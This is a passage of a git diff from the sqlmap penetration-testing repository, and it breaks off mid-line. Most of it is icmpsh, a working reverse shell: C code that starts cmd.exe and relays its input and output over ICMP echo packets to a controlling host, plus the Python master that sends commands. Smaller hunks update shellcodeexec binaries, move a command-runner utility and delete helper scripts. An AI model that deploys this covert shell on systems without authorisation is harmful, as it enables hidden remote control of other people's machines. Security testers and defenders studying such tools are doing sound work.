0)) { + return STATUS_PROCESS_NOT_CREATED; + } + + if (!CreatePipe(&in_read, in_write, &sattr, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + if (!SetHandleInformation(*in_write, HANDLE_FLAG_INHERIT, 0)) { + return STATUS_PROCESS_NOT_CREATED; + } + + // spawn process + memset(&si, 0x00, sizeof(STARTUPINFO)); + si.cb = sizeof(STARTUPINFO); + si.hStdError = out_write; + si.hStdOutput = out_write; + si.hStdInput = in_read; + si.dwFlags |= STARTF_USESTDHANDLES; + + if (!CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, 0, NULL, NULL, (LPSTARTUPINFOA) &si, pi)) { + return STATUS_PROCESS_NOT_CREATED; + } + + CloseHandle(out_write); + CloseHandle(in_read); + + return STATUS_OK; +} + +void usage(char *path) +{ + printf("%s [options] -t target\n", path); + printf("options:\n"); + printf(" -t host host ip address to send ping requests to\n"); + printf(" -r send a single test icmp request and then quit\n"); + printf(" -d milliseconds delay between requests in milliseconds (default is %u)\n", DEFAULT_DELAY); + printf(" -o milliseconds timeout in milliseconds\n"); + printf(" -h this screen\n"); + printf(" -b num maximal number of blanks (unanswered icmp requests)\n"); + printf(" before quitting\n"); + printf(" -s bytes maximal data buffer size in bytes (default is %u bytes)\n\n", DEFAULT_MAX_DATA_SIZE); + printf("In order to improve the speed, lower the delay (-d) between requests or\n"); + printf("increase the size (-s) of the data buffer\n"); +} + +void create_icmp_channel(HANDLE *icmp_chan) +{ + // create icmp file + *icmp_chan = (HANDLE) icmp_create(); +} + +int transfer_icmp(HANDLE icmp_chan, unsigned int target, char *out_buf, unsigned int out_buf_size, char *in_buf, unsigned int *in_buf_size, unsigned int max_in_data_size, unsigned int timeout) +{ + int rs; + char *temp_in_buf; + int nbytes; + + PICMP_ECHO_REPLY echo_reply; + + temp_in_buf = (char *) malloc(max_in_data_size + ICMP_HEADERS_SIZE); + if (!temp_in_buf) { + return TRANSFER_FAILURE; + } + + // send data to remote host + rs = icmp_send( + icmp_chan, + target, + out_buf, + out_buf_size, + NULL, + temp_in_buf, + max_in_data_size + ICMP_HEADERS_SIZE, + timeout); + + // check received data + if (rs > 0) { + echo_reply = (PICMP_ECHO_REPLY) temp_in_buf; + if (echo_reply->DataSize > max_in_data_size) { + nbytes = max_in_data_size; + } else { + nbytes = echo_reply->DataSize; + } + memcpy(in_buf, echo_reply->Data, nbytes); + *in_buf_size = nbytes; + + free(temp_in_buf); + return TRANSFER_SUCCESS; + } + + free(temp_in_buf); + + return TRANSFER_FAILURE; +} + +int load_deps() +{ + HMODULE lib; + + lib = LoadLibraryA("ws2_32.dll"); + if (lib != NULL) { + to_ip = GetProcAddress(lib, "inet_addr"); + if (!to_ip) { + return 0; + } + } + + lib = LoadLibraryA("iphlpapi.dll"); + if (lib != NULL) { + icmp_create = GetProcAddress(lib, "IcmpCreateFile"); + icmp_send = GetProcAddress(lib, "IcmpSendEcho"); + if (icmp_create && icmp_send) { + return 1; + } + } + + lib = LoadLibraryA("ICMP.DLL"); + if (lib != NULL) { + icmp_create = GetProcAddress(lib, "IcmpCreateFile"); + icmp_send = GetProcAddress(lib, "IcmpSendEcho"); + if (icmp_create && icmp_send) { + return 1; + } + } + + printf("failed to load functions (%u)", GetLastError()); + + return 0; +} +int main(int argc, char **argv) +{ + int opt; + char *target; + unsigned int delay, timeout; + unsigned int ip_addr; + HANDLE pipe_read, pipe_write; + HANDLE icmp_chan; + unsigned char *in_buf, *out_buf; + unsigned int in_buf_size, out_buf_size; + DWORD rs; + int blanks, max_blanks; + PROCESS_INFORMATION pi; + int status; + unsigned int max_data_size; + + // set defaults + target = 0; + timeout = DEFAULT_TIMEOUT; + delay = DEFAULT_DELAY; + max_blanks = DEFAULT_MAX_BLANKS; + max_data_size = DEFAULT_MAX_DATA_SIZE; + + status = STATUS_OK; + if (!load_deps()) { + printf("failed to load ICMP library\n"); + return -1; + } + + // parse command line options + for (opt = 1; opt < argc; opt++) { + if (argv[opt][0] == '-') { + switch(argv[opt][1]) { + case 'h': + usage(*argv); + return 0; + case 't': + if (opt + 1 < argc) { + target = argv[opt + 1]; + } + break; + case 'd': + if (opt + 1 < argc) { + delay = atol(argv[opt + 1]); + } + break; + case 'o': + if (opt + 1 < argc) { + timeout = atol(argv[opt + 1]); + } + break; + case 'r': + status = STATUS_SINGLE; + break; + case 'b': + if (opt + 1 < argc) { + max_blanks = atol(argv[opt + 1]); + } + break; + case 's': + if (opt + 1 < argc) { + max_data_size = atol(argv[opt + 1]); + } + break; + default: + printf("unrecognized option -%c\n", argv[1][0]); + usage(*argv); + return -1; + } + } + } + + if (!target) { + printf("you need to specify a host with -t. Try -h for more options\n"); + return -1; + } + ip_addr = to_ip(target); + + // don't spawn a shell if we're only sending a single test request + if (status != STATUS_SINGLE) { + status = spawn_shell(&pi, &pipe_read, &pipe_write); + } + + // create icmp channel + create_icmp_channel(&icmp_chan); + if (icmp_chan == INVALID_HANDLE_VALUE) { + printf("unable to create ICMP file: %u\n", GetLastError()); + return -1; + } + + // allocate transfer buffers + in_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); + out_buf = (char *) malloc(max_data_size + ICMP_HEADERS_SIZE); + if (!in_buf || !out_buf) { + printf("failed to allocate memory for transfer buffers\n"); + return -1; + } + memset(in_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); + memset(out_buf, 0x00, max_data_size + ICMP_HEADERS_SIZE); + + // sending/receiving loop + blanks = 0; + do { + + switch(status) { + case STATUS_SINGLE: + // reply with a static string + out_buf_size = sprintf(out_buf, "Test1234\n"); + break; + case STATUS_PROCESS_NOT_CREATED: + // reply with error message + out_buf_size = sprintf(out_buf, "Process was not created\n"); + break; + default: + // read data from process via pipe + out_buf_size = 0; + if (PeekNamedPipe(pipe_read, NULL, 0, NULL, &out_buf_size, NULL)) { + if (out_buf_size > 0) { + out_buf_size = 0; + rs = ReadFile(pipe_read, out_buf, max_data_size, &out_buf_size, NULL); + if (!rs && GetLastError() != ERROR_IO_PENDING) { + out_buf_size = sprintf(out_buf, "Error: ReadFile failed with %i\n", GetLastError()); + } + } + } else { + out_buf_size = sprintf(out_buf, "Error: PeekNamedPipe failed with %i\n", GetLastError()); + } + break; + } + + // send request/receive response + if (transfer_icmp(icmp_chan, ip_addr, out_buf, out_buf_size, in_buf, &in_buf_size, max_data_size, timeout) == TRANSFER_SUCCESS) { + if (status == STATUS_OK) { + // write data from response back into pipe + WriteFile(pipe_write, in_buf, in_buf_size, &rs, 0); + } + blanks = 0; + } else { + // no reply received or error occured + blanks++; + } + + // wait between requests + Sleep(delay); + + } while (status == STATUS_OK && blanks < max_blanks); + + if (status == STATUS_OK) { + TerminateProcess(pi.hProcess, 0); + } + + return 0; +} + diff --git a/extra/icmpsh/icmpsh.exe_ b/extra/icmpsh/icmpsh.exe_ index cd3c62e0960..46a2115cc44 100644 Binary files a/extra/icmpsh/icmpsh.exe_ and b/extra/icmpsh/icmpsh.exe_ differ diff --git a/extra/icmpsh/icmpsh_m.py b/extra/icmpsh/icmpsh_m.py index 36fe44982ec..17370fdc001 100644 --- a/extra/icmpsh/icmpsh_m.py +++ b/extra/icmpsh/icmpsh_m.py @@ -22,7 +22,6 @@ import os import select import socket -import subprocess import sys def setNonBlocking(fd): @@ -37,7 +36,7 @@ def setNonBlocking(fd): fcntl.fcntl(fd, fcntl.F_SETFL, flags) def main(src, dst): - if subprocess.mswindows: + if sys.platform == "nt": sys.stderr.write('icmpsh master can only run on Posix systems\n') sys.exit(255) @@ -76,57 +75,64 @@ def main(src, dst): # Instantiate an IP packets decoder decoder = ImpactDecoder.IPDecoder() - while 1: - cmd = '' - - # Wait for incoming replies - if sock in select.select([ sock ], [], [])[0]: - buff = sock.recv(4096) - - if 0 == len(buff): - # Socket remotely closed - sock.close() - sys.exit(0) - - # Packet received; decode and display it - ippacket = decoder.decode(buff) - icmppacket = ippacket.child() - - # If the packet matches, report it to the user - if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): - # Get identifier and sequence number - ident = icmppacket.get_icmp_id() - seq_id = icmppacket.get_icmp_seq() - data = icmppacket.get_data_as_string() - - if len(data) > 0: - sys.stdout.write(data) - - # Parse command from standard input - try: - cmd = sys.stdin.readline() - except: - pass - - if cmd == 'exit\n': - return - - # Set sequence number and identifier - icmp.set_icmp_id(ident) - icmp.set_icmp_seq(seq_id) - - # Include the command as data inside the ICMP packet - icmp.contains(ImpactPacket.Data(cmd)) - - # Calculate its checksum - icmp.set_icmp_cksum(0) - icmp.auto_checksum = 1 - - # Have the IP packet contain the ICMP packet (along with its payload) - ip.contains(icmp) - - # Send it to the target host - sock.sendto(ip.get_packet(), (dst, 0)) + while True: + try: + cmd = '' + + # Wait for incoming replies + if sock in select.select([sock], [], [])[0]: + buff = sock.recv(4096) + + if 0 == len(buff): + # Socket remotely closed + sock.close() + sys.exit(0) + + # Packet received; decode and display it + ippacket = decoder.decode(buff) + icmppacket = ippacket.child() + + # If the packet matches, report it to the user + if ippacket.get_ip_dst() == src and ippacket.get_ip_src() == dst and 8 == icmppacket.get_icmp_type(): + # Get identifier and sequence number + ident = icmppacket.get_icmp_id() + seq_id = icmppacket.get_icmp_seq() + data = icmppacket.get_data_as_string() + + if len(data) > 0: + sys.stdout.write(data) + + # Parse command from standard input + try: + cmd = sys.stdin.readline() + except: + pass + + if cmd == 'exit\n': + return + + # Set sequence number and identifier + icmp.set_icmp_id(ident) + icmp.set_icmp_seq(seq_id) + + # Include the command as data inside the ICMP packet + icmp.contains(ImpactPacket.Data(cmd)) + + # Calculate its checksum + icmp.set_icmp_cksum(0) + icmp.auto_checksum = 1 + + # Have the IP packet contain the ICMP packet (along with its payload) + ip.contains(icmp) + + try: + # Send it to the target host + sock.sendto(ip.get_packet(), (dst, 0)) + except socket.error as ex: + sys.stderr.write("'%s'\n" % ex) + sys.stderr.flush() + except: + break if __name__ == '__main__': if len(sys.argv) < 3: diff --git a/extra/mssqlsig/update.py b/extra/mssqlsig/update.py deleted file mode 100644 index 1f3c36893c5..00000000000 --- a/extra/mssqlsig/update.py +++ /dev/null @@ -1,137 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import codecs -import os -import re -import urllib2 -import urlparse - -from xml.dom.minidom import Document - -# Path to the XML file with signatures -MSSQL_XML = os.path.abspath("../../xml/banner/mssql.xml") - -# Url to update Microsoft SQL Server XML versions file from -MSSQL_VERSIONS_URL = "http://www.sqlsecurity.com/FAQs/SQLServerVersionDatabase/tabid/63/Default.aspx" - -def updateMSSQLXML(): - if not os.path.exists(MSSQL_XML): - errMsg = "[ERROR] file '%s' does not exist. please run the script from it's parent directory." % MSSQL_XML - print errMsg - return - - infoMsg = "[INFO] retrieving data from '%s'" % MSSQL_VERSIONS_URL - print infoMsg - - try: - req = urllib2.Request(MSSQL_VERSIONS_URL) - f = urllib2.urlopen(req) - mssqlVersionsHtmlString = f.read() - f.close() - except urllib2.URLError: - __mssqlPath = urlparse.urlsplit(MSSQL_VERSIONS_URL) - __mssqlHostname = __mssqlPath[1] - - warnMsg = "[WARNING] sqlmap was unable to connect to %s," % __mssqlHostname - warnMsg += " check your Internet connection and retry" - print warnMsg - - return - - releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I | re.M) - releasesCount = len(releases) - - # Create the minidom document - doc = Document() - - # Create the base element - root = doc.createElement("root") - doc.appendChild(root) - - for index in xrange(0, releasesCount): - release = releases[index] - - # Skip Microsoft SQL Server 6.5 because the HTML - # table is in another format - if release == "6.5": - continue - - # Create the base element - signatures = doc.createElement("signatures") - signatures.setAttribute("release", release) - root.appendChild(signatures) - - startIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index]) - - if index == releasesCount - 1: - stopIdx = len(mssqlVersionsHtmlString) - else: - stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1]) - - mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx] - servicepackVersion = re.findall("[7\.0|2000|2005|2008|2008 R2]*(.*?)[\r]*\n", mssqlVersionsReleaseString, re.I | re.M) - - for servicePack, version in servicepackVersion: - if servicePack.startswith(" "): - servicePack = servicePack[1:] - if "/" in servicePack: - servicePack = servicePack[:servicePack.index("/")] - if "(" in servicePack: - servicePack = servicePack[:servicePack.index("(")] - if "-" in servicePack: - servicePack = servicePack[:servicePack.index("-")] - if "*" in servicePack: - servicePack = servicePack[:servicePack.index("*")] - if servicePack.startswith("+"): - servicePack = "0%s" % servicePack - - servicePack = servicePack.replace("\t", " ") - servicePack = servicePack.replace("No SP", "0") - servicePack = servicePack.replace("RTM", "0") - servicePack = servicePack.replace("TM", "0") - servicePack = servicePack.replace("SP", "") - servicePack = servicePack.replace("Service Pack", "") - servicePack = servicePack.replace(" element - signature = doc.createElement("signature") - signatures.appendChild(signature) - - # Create a element - versionElement = doc.createElement("version") - signature.appendChild(versionElement) - - # Give the elemenet some text - versionText = doc.createTextNode(version) - versionElement.appendChild(versionText) - - # Create a element - servicepackElement = doc.createElement("servicepack") - signature.appendChild(servicepackElement) - - # Give the elemenet some text - servicepackText = doc.createTextNode(servicePack) - servicepackElement.appendChild(servicepackText) - - # Save our newly created XML to the signatures file - mssqlXml = codecs.open(MSSQL_XML, "w", "utf8") - doc.writexml(writer=mssqlXml, addindent=" ", newl="\n") - mssqlXml.close() - - infoMsg = "[INFO] done. retrieved data parsed and saved into '%s'" % MSSQL_XML - print infoMsg - -if __name__ == "__main__": - updateMSSQLXML() diff --git a/extra/runcmd/README.txt b/extra/runcmd/README.txt index 717800aa418..4d4caa8f8eb 100644 --- a/extra/runcmd/README.txt +++ b/extra/runcmd/README.txt @@ -1,3 +1,3 @@ -Files in this folder can be used to compile auxiliary program that can -be used for running command prompt commands skipping standard "cmd /c" way. -They are licensed under the terms of the GNU Lesser General Public License. +runcmd.exe is an auxiliary program that can be used for running command prompt +commands skipping standard "cmd /c" way. It is licensed under the terms of the +GNU Lesser General Public License. diff --git a/extra/runcmd/runcmd.exe_ b/extra/runcmd/runcmd.exe_ new file mode 100644 index 00000000000..d3b4bebfe90 Binary files /dev/null and b/extra/runcmd/runcmd.exe_ differ diff --git a/extra/runcmd/windows/README.txt b/extra/runcmd/src/README.txt similarity index 100% rename from extra/runcmd/windows/README.txt rename to extra/runcmd/src/README.txt diff --git a/extra/runcmd/windows/runcmd.sln b/extra/runcmd/src/runcmd.sln similarity index 97% rename from extra/runcmd/windows/runcmd.sln rename to extra/runcmd/src/runcmd.sln index 0770582d092..a70c648d0dc 100644 --- a/extra/runcmd/windows/runcmd.sln +++ b/extra/runcmd/src/runcmd.sln @@ -1,20 +1,20 @@ - -Microsoft Visual Studio Solution File, Format Version 9.00 -# Visual Studio 2005 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" -EndProject -Global - GlobalSection(SolutionConfigurationPlatforms) = preSolution - Debug|Win32 = Debug|Win32 - Release|Win32 = Release|Win32 - EndGlobalSection - GlobalSection(ProjectConfigurationPlatforms) = postSolution - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 - {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 - EndGlobalSection - GlobalSection(SolutionProperties) = preSolution - HideSolutionNode = FALSE - EndGlobalSection -EndGlobal + +Microsoft Visual Studio Solution File, Format Version 9.00 +# Visual Studio 2005 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Release|Win32 = Release|Win32 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32 + {1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/extra/runcmd/windows/runcmd/runcmd.cpp b/extra/runcmd/src/runcmd/runcmd.cpp similarity index 96% rename from extra/runcmd/windows/runcmd/runcmd.cpp rename to extra/runcmd/src/runcmd/runcmd.cpp index ab40a0c218e..743f2a279ef 100644 --- a/extra/runcmd/windows/runcmd/runcmd.cpp +++ b/extra/runcmd/src/runcmd/runcmd.cpp @@ -1,46 +1,46 @@ -/* - runcmd - a program for running command prompt commands - Copyright (C) 2010 Miroslav Stampar - email: miroslav.stampar@gmail.com - - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA -*/ - -#include -#include -#include -#include "stdafx.h" -#include - -using namespace std; -int main(int argc, char* argv[]) -{ - FILE *fp; - string cmd; - - for( int count = 1; count < argc; count++ ) - cmd += " " + string(argv[count]); - - fp = _popen(cmd.c_str(), "r"); - - if (fp != NULL) { - char buffer[BUFSIZ]; - - while (fgets(buffer, sizeof buffer, fp) != NULL) - fputs(buffer, stdout); - } - - return 0; -} +/* + runcmd - a program for running command prompt commands + Copyright (C) 2010 Miroslav Stampar + email: miroslav.stampar@gmail.com + + This library is free software; you can redistribute it and/or + modify it under the terms of the GNU Lesser General Public + License as published by the Free Software Foundation; either + version 2.1 of the License, or (at your option) any later version. + + This library is distributed in the hope that it will be useful, + but WITHOUT ANY WARRANTY; without even the implied warranty of + MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + Lesser General Public License for more details. + + You should have received a copy of the GNU Lesser General Public + License along with this library; if not, write to the Free Software + Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA +*/ + +#include +#include +#include +#include "stdafx.h" +#include + +using namespace std; +int main(int argc, char* argv[]) +{ + FILE *fp; + string cmd; + + for( int count = 1; count < argc; count++ ) + cmd += " " + string(argv[count]); + + fp = _popen(cmd.c_str(), "r"); + + if (fp != NULL) { + char buffer[BUFSIZ]; + + while (fgets(buffer, sizeof buffer, fp) != NULL) + fputs(buffer, stdout); + } + + return 0; +} diff --git a/extra/runcmd/windows/runcmd/runcmd.vcproj b/extra/runcmd/src/runcmd/runcmd.vcproj similarity index 95% rename from extra/runcmd/windows/runcmd/runcmd.vcproj rename to extra/runcmd/src/runcmd/runcmd.vcproj index 928c71606b0..157e33863d9 100644 --- a/extra/runcmd/windows/runcmd/runcmd.vcproj +++ b/extra/runcmd/src/runcmd/runcmd.vcproj @@ -1,225 +1,225 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/extra/runcmd/windows/runcmd/stdafx.cpp b/extra/runcmd/src/runcmd/stdafx.cpp similarity index 97% rename from extra/runcmd/windows/runcmd/stdafx.cpp rename to extra/runcmd/src/runcmd/stdafx.cpp index f5e349538ca..e191a9156a4 100644 --- a/extra/runcmd/windows/runcmd/stdafx.cpp +++ b/extra/runcmd/src/runcmd/stdafx.cpp @@ -1,8 +1,8 @@ -// stdafx.cpp : source file that includes just the standard includes -// runcmd.pch will be the pre-compiled header -// stdafx.obj will contain the pre-compiled type information - -#include "stdafx.h" - -// TODO: reference any additional headers you need in STDAFX.H -// and not in this file +// stdafx.cpp : source file that includes just the standard includes +// runcmd.pch will be the pre-compiled header +// stdafx.obj will contain the pre-compiled type information + +#include "stdafx.h" + +// TODO: reference any additional headers you need in STDAFX.H +// and not in this file diff --git a/extra/runcmd/windows/runcmd/stdafx.h b/extra/runcmd/src/runcmd/stdafx.h similarity index 96% rename from extra/runcmd/windows/runcmd/stdafx.h rename to extra/runcmd/src/runcmd/stdafx.h index bdabbfb48e9..0be0e6ffee0 100644 --- a/extra/runcmd/windows/runcmd/stdafx.h +++ b/extra/runcmd/src/runcmd/stdafx.h @@ -1,17 +1,17 @@ -// stdafx.h : include file for standard system include files, -// or project specific include files that are used frequently, but -// are changed infrequently -// - -#pragma once - -#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. -#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. -#endif - -#include -#include - - - -// TODO: reference additional headers your program requires here +// stdafx.h : include file for standard system include files, +// or project specific include files that are used frequently, but +// are changed infrequently +// + +#pragma once + +#ifndef _WIN32_WINNT // Allow use of features specific to Windows XP or later. +#define _WIN32_WINNT 0x0501 // Change this to the appropriate value to target other versions of Windows. +#endif + +#include +#include + + + +// TODO: reference additional headers your program requires here diff --git a/extra/safe2bin/README.txt b/extra/safe2bin/README.txt deleted file mode 100644 index 06400d6ea98..00000000000 --- a/extra/safe2bin/README.txt +++ /dev/null @@ -1,17 +0,0 @@ -To use safe2bin.py you need to pass it the original file, -and optionally the output file name. - -Example: - -$ python ./safe2bin.py -i output.txt -o output.txt.bin - -This will create an binary decoded file output.txt.bin. For example, -if the content of output.txt is: "\ttest\t\x32\x33\x34\nnewline" it will -be decoded to: " test 234 -newline" - -If you skip the output file name, general rule is that the binary -file names are suffixed with the string '.bin'. So, that means that -the upper example can also be written in the following form: - -$ python ./safe2bin.py -i output.txt diff --git a/extra/safe2bin/__init__.py b/extra/safe2bin/__init__.py deleted file mode 100644 index 9e1072a9c4f..00000000000 --- a/extra/safe2bin/__init__.py +++ /dev/null @@ -1,8 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -pass diff --git a/extra/safe2bin/safe2bin.py b/extra/safe2bin/safe2bin.py deleted file mode 100644 index 0c133b72448..00000000000 --- a/extra/safe2bin/safe2bin.py +++ /dev/null @@ -1,131 +0,0 @@ -#!/usr/bin/env python - -""" -safe2bin.py - Simple safe(hex) to binary format converter - -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii -import re -import string -import os -import sys - -from optparse import OptionError -from optparse import OptionParser - -# Regex used for recognition of hex encoded characters -HEX_ENCODED_CHAR_REGEX = r"(?P\\x[0-9A-Fa-f]{2})" - -# Regex used for recognition of representation for hex encoded invalid unicode characters -INVALID_UNICODE_CHAR_REGEX = r"(?P\\\?[0-9A-Fa-f]{2})" - -# Raw chars that will be safe encoded to their slash (\) representations (e.g. newline to \n) -SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c" - -# Characters that don't need to be safe encoded -SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', ''))) - -# String used for temporary marking of slash characters -SLASH_MARKER = "__SLASH__" - -def safecharencode(value): - """ - Returns safe representation of a given basestring value - - >>> safecharencode(u'test123') - u'test123' - >>> safecharencode(u'test\x01\x02\xff') - u'test\\01\\02\\03\\ff' - """ - - retVal = value - - if isinstance(value, basestring): - if any(_ not in SAFE_CHARS for _ in value): - retVal = retVal.replace('\\', SLASH_MARKER) - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS: - retVal = retVal.replace(char, repr(char).strip('\'')) - - retVal = reduce(lambda x, y: x + (y if (y in string.printable or ord(y) > 255) else '\\x%02x' % ord(y)), retVal, (unicode if isinstance(value, unicode) else str)()) - - retVal = retVal.replace(SLASH_MARKER, "\\\\") - elif isinstance(value, list): - for i in xrange(len(value)): - retVal[i] = safecharencode(value[i]) - - return retVal - -def safechardecode(value, binary=False): - """ - Reverse function to safecharencode - """ - - retVal = value - if isinstance(value, basestring): - retVal = retVal.replace('\\\\', SLASH_MARKER) - - while True: - match = re.search(HEX_ENCODED_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), (unichr if isinstance(value, unicode) else chr)(ord(binascii.unhexlify(match.group("result").lstrip("\\x"))))) - else: - break - - for char in SAFE_ENCODE_SLASH_REPLACEMENTS[::-1]: - retVal = retVal.replace(repr(char).strip('\''), char) - - retVal = retVal.replace(SLASH_MARKER, '\\') - - if binary: - if isinstance(retVal, unicode): - retVal = retVal.encode("utf8") - while True: - match = re.search(INVALID_UNICODE_CHAR_REGEX, retVal) - if match: - retVal = retVal.replace(match.group("result"), chr(ord(binascii.unhexlify(match.group("result").lstrip("\\?"))))) - else: - break - - elif isinstance(value, (list, tuple)): - for i in xrange(len(value)): - retVal[i] = safechardecode(value[i]) - - return retVal - -def main(): - usage = '%s -i [-o ]' % sys.argv[0] - parser = OptionParser(usage=usage, version='0.1') - - try: - parser.add_option('-i', dest='inputFile', help='Input file') - parser.add_option('-o', dest='outputFile', help='Output file') - - (args, _) = parser.parse_args() - - if not args.inputFile: - parser.error('Missing the input file, -h for help') - - except (OptionError, TypeError), e: - parser.error(e) - - if not os.path.isfile(args.inputFile): - print 'ERROR: the provided input file \'%s\' is not a regular file' % args.inputFile - sys.exit(1) - - f = open(args.inputFile, 'r') - data = f.read() - f.close() - - if not args.outputFile: - args.outputFile = args.inputFile + '.bin' - - f = open(args.outputFile, 'wb') - f.write(safechardecode(data)) - f.close() - -if __name__ == '__main__': - main() diff --git a/extra/shellcodeexec/linux/shellcodeexec.x32_ b/extra/shellcodeexec/linux/shellcodeexec.x32_ index cc591725499..c0857d971f5 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x32_ and b/extra/shellcodeexec/linux/shellcodeexec.x32_ differ diff --git a/extra/shellcodeexec/linux/shellcodeexec.x64_ b/extra/shellcodeexec/linux/shellcodeexec.x64_ index 25aa6ea4a87..13ef7522987 100644 Binary files a/extra/shellcodeexec/linux/shellcodeexec.x64_ and b/extra/shellcodeexec/linux/shellcodeexec.x64_ differ diff --git a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ index a26bb6e1036..b55141d1d93 100644 Binary files a/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ and b/extra/shellcodeexec/windows/shellcodeexec.x32.exe_ differ diff --git a/extra/shutils/_sqlmap.py b/extra/shutils/_sqlmap.py deleted file mode 100644 index 44c33bfb1b4..00000000000 --- a/extra/shutils/_sqlmap.py +++ /dev/null @@ -1,177 +0,0 @@ -#compdef sqlmap.py - -# sqlmap completion commands. written by kost -# put this file in your zsh completion dir and restart your shell. Zsh completion dir is usually -# located somewhere in /usr/share/zsh/ or /usr/local/share/zsh - -local curcontext="$curcontext" state line - -_arguments -C -s \ - '(- *)'{--help,-h}'[Show basic help message and exit]' \ - '(- *)'-hh'[Show advanced help message and exit]' \ - '(-v)'-v+'[Verbosity level: 0-6 (default 1)]:Verbosity level (0-6) - default 1' \ - '(-d)'-d+'[Direct connection to the database]' \ - '(-u,--url)'{-u+,--url=-}'[Target url]' \ - '(-g)'-g+'[Process Google dork results as target urls]' \ - '(--data)'--data=-'[Data string to be sent through POST]' \ - '(-l)'-l+'[Parse targets from Burp or WebScarab proxy logs]:LOGFILE:_files' \ - '(-m)'-m+'[Scan multiple targets enlisted in a given textual file]:BULKFILE:_files' \ - '(-r)'-r+'[Load HTTP request from a file]:REQUESTFILE:_files' \ - '(-s)'-s+'[Load session from a stored (.sqlite) file]:SESSIONFILE:_files' \ - '(-c)'-c+'[Load options from a configuration INI file]:CONFIGFILE:_files' \ - '(--param-del)'--param-del=-'[Character used for splitting parameter values]:PDEL' \ - '(--cookie)'--cookie=-'[HTTP Cookie header]:COOKIE' \ - '(--load-cookies)'--load-cookies=-'[File containing cookies in Netscape/wget format]:COOKIEFILE:_files' \ - '(--drop-set-cookie)'--drop-set-cookie'[Ignore Set-Cookie header from response]' \ - '(--user-agent)'--user-agent=-'[HTTP User-Agent header]:HTTP User Agent' \ - '(--random-agent)'--random-agent'[Use randomly selected HTTP User-Agent header]' \ - '(--randomize)'--randomize=-'[Randomly change value for given parameter(s)]:RPARAM' \ - '(--force-ssl)'--force-ssl'[Force usage of SSL/HTTPS requests]' \ - '(--host)'--host=-'[HTTP Host header]:Host Header' \ - '(--referer)'--referer=-'[HTTP Referer header]:REFERER' \ - '(--headers)'--headers=-'[Extra headers (e.g. Accept-Language: fr\nETag: 123)]:HEADERS' \ - '(--auth-type)'--auth-type=-'[HTTP authentication type (Basic, Digest or NTLM)]:ATYPE' \ - '(--auth-cred)'--auth-cred=-'[HTTP authentication credentials (name:password)]:ACRED' \ - '(--auth-cert)'--auth-cert=-'[HTTP authentication 